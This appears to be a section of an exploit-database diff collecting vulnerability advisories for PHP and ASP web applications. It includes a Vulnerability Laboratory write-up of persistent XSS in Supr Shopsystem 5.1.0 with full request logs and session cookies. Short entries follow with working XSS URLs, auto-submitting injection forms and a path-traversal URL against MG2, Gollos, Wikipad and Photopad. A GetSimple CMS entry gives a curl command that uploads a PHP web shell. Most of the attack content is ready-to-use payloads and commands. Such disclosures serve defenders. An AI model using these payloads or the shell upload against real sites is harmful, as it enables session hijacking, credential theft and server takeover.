3.1
Product & Service Introduction:
===============================
SUPR is a modern and user-friendly system which allows each store very quickly and easily create their own online store.
Without installation and own webspace you can begin to create products and content right after the registration. With our
free designs and the great customization options you can customize and adapt to your ideas your shop. You have to be an
expert to work with the SUPR Shop.
( Copy of the Vendor Homepage: http://de.supr.com/tour )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent input validation vulnerability in the official Supr Shopsystem v5.1.0 web-application.
Vulnerability Disclosure Timeline:
==================================
2014-11-05: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Supreme NewMedia GmbH
Product: Supr - Shopsystem Web Application 5.1.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
An application-side input validation web vulnerability has been discovered in the official Supr Shopsystem v5.1.0 web-application.
The vulnerability can be exploited by remote attackers to execute persistent codes with forced client-side browser requests through a non
expired session or by local post inject.
The vulnerability is located in the blogname, shop slogan and tags input fields of the Dashboard > Settings > General > (setting_shopdetail) module.
Remote attackers are able to prepare client-side requests with malicious context to take over administrator accounts on interaction (click link).
Local attackers with privileged user accounts are also able to inject own script codes locally by manipulation of the vulnerable setting_shopdetail
POST method request. The execution of the code occurs above to the error exception-handling that should prevent but got evaded.
The error class with the exception will be evaded because of the request that went through and executes earlier then the exception prevents the execute.
Remote attackers are able to prepare a post request that allows to execute the code in one shot through the same origin policy. The request can be injected
locally to reproduce or as prepare POST request that manipulates the values when a non expired session clicks for example a manipulated link.
The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.2.
Exploitation of the application-side web vulnerability requires a low privileged web-application user account and low user interaction.
Successful exploitation of the vulnerabilities result in persistent phishing mails, session hijacking, persistent external redirect to malicious
sources and application-side manipulation of affected or connected module context.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Dashboard > Settings > General > (setting_shopdetail)
Vulnerable Parameter(s):
[+] blogname
[+] blog/shop slogan
[+] tags
Affected Module(s):
[+] Dashboard (localhost:80/a/wp-admin/[x])
Proof of Concept (PoC):
=======================
The application-side vulnerability can be exploited by remote attackers with low privileged application user account and low user interaction click.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: Dashboard > Settings > General > (setting_shopdetail)
<form id="setting_shopdetail" name="setting_shopdetail" method="post" action="">
<div class="form-row field-error">
<div class="label">
<label for="setting_shopdata_blogname" class="mandatory">Shopname</label>
</div>
<div class="field">
<input id="setting_shopdata_blogname" name="setting_shopdata[blogname]" value="" type="text"><[PERSISTENT INJECTED SCRIPT CODE!];)" <"="">
<!-- <pre></pre> -->
<ul class="">
<li class="error">Das Feld <strong>Shopname</strong> enthält leider ungültige Zeichen!</li>
</ul></div>
Note: The error class with the exception will be evaded because of the request that went through and executes earlier then the exception prevents the execute.
Remote attackers are able to prepare a post request that allows to execute the code in one shot through the same origin policy. The request can be injected
locally to reproduce or as prepare POST request that manipulates the values when a non expired session clicks for example a manipulated link.
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[localhost:80]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata]
Cookie[PHPSESSID=ugqds8368sctjctkj1ldv34pu1; PHPSESSID=ugqds8368sctjctkj1ldv34pu1; __utma=182188197.576119580.1414780466.1414783994.1414786850.3;
__utmc=182188197; __utmz=182188197.1414780466.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=ugqds8368sctjctkj1ldv34pu1;
wordpress_sec_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9555fc6c5a1ac4e4c05dacbb0d9dcd47;
wordpress_logged_in_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9fc5b243fde7af93c9fce527e94da34f;
_ga=GA1.2.576119580.1414780466; _pk_id.9.44c1=298ac1e6c0a22deb.1414784009.1.1414784081.1414784009.; __utma=1.576119580.1414780466.1414786842.1414786842.1;
__utmb=1.4.10.1414786842; __utmc=1; __utmz=1.1414786842.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; wp-settings-time-29002=1414787115;
__utmb=182188197.24.10.1414786850]
Connection[keep-alive]
Cache-Control[max-age=0]
POST-Daten:
setting_shopdata%5Bblogname%5D[%22%3E%3C[PERSISTENT INJECTED SCRIPT CODE!]%28%22VL%22%29+%3C]
setting_shopdata%5Bblogdescription%5D[Shop+Slogan+%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
shopreg%5Bshoplang%5D[de_DE]
setting_shopdata%5Bshoplang%5D[de_DE]
setting_shopdata%5Bshopcategory%5D[]
setting_shopdata%5Bshopdesc%5D[%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
setting_shopdata%5Bshoptags%5D[%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
setting_shopdata%5Bemailfooter%5D[]
setting_shopdata%5Binvoicenote%5D[]
setting_shopdata%5Bshop_google_analytics_account%5D[]
setting_shopdata%5Bshop_google_webmastertools_verification_code%5D[]
setting_shopdata%5Bsubmit%5D[save]
Response Header:
Date[Fri, 31 Oct 2014 20:25:22 GMT]
Server[Apache/2.2.16 (Debian)]
X-Powered-By[PHP/5.3.3-7+squeeze22]
p3p[CP="CAO PSA OUR"]
Expires[Wed, 11 Jan 1984 05:00:00 GMT]
Cache-Control[no-cache, must-revalidate, max-age=0, no-cache]
Set-Cookie[PHPSESSID=ugqds8368sctjctkj1ldv34pu1
wp-settings-29002=deleted; expires=Thu, 31-Oct-2013 20:25:22 GMT; path=/
wp-settings-time-29002=1414787123; expires=Sat, 31-Oct-2015 20:25:23 GMT; path=/]
Pragma[no-cache]
X-Frame-Options[SAMEORIGIN]
Connection[close]
Content-Type[text/html; charset=UTF-8]
--
Status: 200[OK]
GET https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/[PERSISTENT INJECTED SCRIPT CODE!]
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[283] Mime Type[text/html]
Request Header:
Host[localhost:80]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata]
Cookie[PHPSESSID=ugqds8368sctjctkj1ldv34pu1; PHPSESSID=ugqds8368sctjctkj1ldv34pu1; __utma=182188197.576119580.1414780466.1414783994.1414786850.3;
__utmc=182188197; __utmz=182188197.1414780466.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=ugqds8368sctjctkj1ldv34pu1;
wordpress_sec_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9555fc6c5a1ac4e4c05dacbb0d9dcd47;
wordpress_logged_in_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9fc5b243fde7af93c9fce527e94da34f;
_ga=GA1.2.576119580.1414780466; _pk_id.9.44c1=298ac1e6c0a22deb.1414784009.1.1414784081.1414784009.; __utma=1.576119580.1414780466.1414786842.1414786842.1;
__utmb=1.4.10.1414786842; __utmc=1; __utmz=1.1414786842.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; wp-settings-time-29002=1414787123; __utmb=182188197.24.10.1414786850]
Connection[keep-alive]
Cache-Control[max-age=0]
Response Header:
Date[Fri, 31 Oct 2014 20:25:24 GMT]
Server[Apache/2.2.16 (Debian)]
Content-Length[283]
Keep-Alive[timeout=5, max=8]
Connection[Keep-Alive]
Content-Type[text/html; charset=iso-8859-1]
Reference(s):
https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata
https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php
https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/[x]
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable setting_shopdetail values in the input POST method request.
Restrict the input fields of the tags, blogname and blog slogan to prevent persistent script code injection attacks.
Setup the error exception above to the input mask and reconfigure it to capture the events correctly.
Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the shopsystem is estimated as medium. (CVSS 3.1)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
COMPANY: Evolution Security GmbH
BUSINESS: www.evolution-sec.com

29
platforms/php/webapps/35348.txt Executable file
View file

@ -0,0 +1,29 @@
source: http://www.securityfocus.com/bid/46378/info
MG2 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
MG2 0.5.1 is vulnerable; other versions may also be affected.
http://www.example.com/mg2/skins/rounded/templates/thumbnails_password.php
- param(GET): list=25<script>alert(1)</script>
- param(GET): id=25<script>alert(1)</script>
http://www.example.com/mg2/skins/rounded/templates/viewimage_comments.php
- param(GET): id=31<script>alert(1)</script>
http://www.example.com/mg2/skins/admin/admin1_menu.php
- param(GET): list=41<script>alert(1)</script>
http://www.example.com/mg2/skins/admin/admin2_comments.php
- param(GET): list=45<script>alert(1)</script>
http://www.example.com/mg2/skins/admin/admin2_edit.php
- param(GET): editID=53<script>alert(1)</script>
http://www.example.com/mg2/skins/admin/admin2_newfolder.php
- param(GET): list=59<script>alert(1)</script>
http://www.example.com/mg2/skins/admin/admin3_folders.php
- param(GET): list=71<script>alert(1)</script>

17
platforms/php/webapps/35349.txt Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/46379/info
Gollos is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Gollos 2.8 is vulnerable; other versions may also be affected.
http://www.example.com/?returnurl="><script>alert(document.cookie)</script>
http://www.example.com/register.aspx?returnurl="><script>alert(document.cookie)</script>
http://www.example.com/publication/info.aspx?pt=1&returnurl="><script>alert(document.cookie)</script>
http://www.example.com/user/add.aspx?returnurl="><script>alert(document.cookie)</script>user/add.aspx
http://www.example.com/product/list.aspx?q=1"><script>alert(document.cookie)</script>&x=0&y=0

26
platforms/php/webapps/35350.txt Executable file
View file

@ -0,0 +1,26 @@
source: http://www.securityfocus.com/bid/46383/info
Wikipad is prone to a cross-site scripting vulnerability, an HTML-injection vulnerability, and an information-disclosure vulnerability.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and obtain sensitive information.
Wikipad 1.6.0 is vulnerable; other versions may also be affected.
Information-disclosure:
http://www.example.com/pages.php?id=./../../../../../txt_file
Cross-site scripting:
http://www.example.com/pages.php?id=index"><script>alert(document.cookie)</script>
http://www.example.com/pages.php?action=edit&id=27-01-2011"><script>alert(document.cookie)</script>
HTML-injection:
<form action="http://host/pages.php?action=edit&id=index&title=index" method="post" name="main">
<input type="hidden" name="data[text]" value=&#039;text"><script>alert(document.cookie)</script>&#039;>
</form>
<script>
document.main.submit();
</script>

19
platforms/php/webapps/35351.txt Executable file
View file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/46385/info
Photopad is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Photopad 1.2.0 is vulnerable; other versions may also be affected.
1. http://host/files.php?action=edit&id=999"><script>alert(document.cookie)</script>
2. http://host/gallery.php?action=view&id=999"><script>alert(document.cookie)</script>
3. <form action="http://host/files.php?action=edit&id=2" method="post" name="main">
<input type="hidden" name="data[title]" value=&#039;title"><script>alert(document.cookie)</script>&#039;>
<input type="hidden" name="data[tags]" value=&#039;tag&#039;>
</form>
<script>
document.main.submit();
</script>

29
platforms/php/webapps/35353.txt Executable file
View file

@ -0,0 +1,29 @@
source: http://www.securityfocus.com/bid/46427/info
GetSimple CMS is prone to an arbitrary-file-upload vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
GetSimple CMS 2.03 is vulnerable; other versions may also be affected.
Bug Code:
getsimple/admin/upload-ajax.php
if ($_REQUEST[&#039;sessionHash&#039;] === $SESSIONHASH) {
if (!empty($_FILES))
{
$tempFile = $_FILES[&#039;Filedata&#039;][&#039;tmp_name&#039;];
$name = clean_img_name($_FILES[&#039;Filedata&#039;][&#039;name&#039;]);
$targetPath = GSDATAUPLOADPATH;
$targetFile = str_replace(//,&#039;/,$targetPath) . $name;
move_uploaded_file($tempFile, $targetFile);
----------------------------------------------------------------------
Generating SESSIONHASH: md5( $salt. $sitename)
[XPL]
curl -F “Filedata=@yourshell.txt;filename=shell.php”
http://getsimple_localhost/admin/upload-ajax.php\?sessionHash\=HASH CREATO
After, enjoy your Bacon-Shell here ...http://getsimple_localhost/
data/uploads/shell.php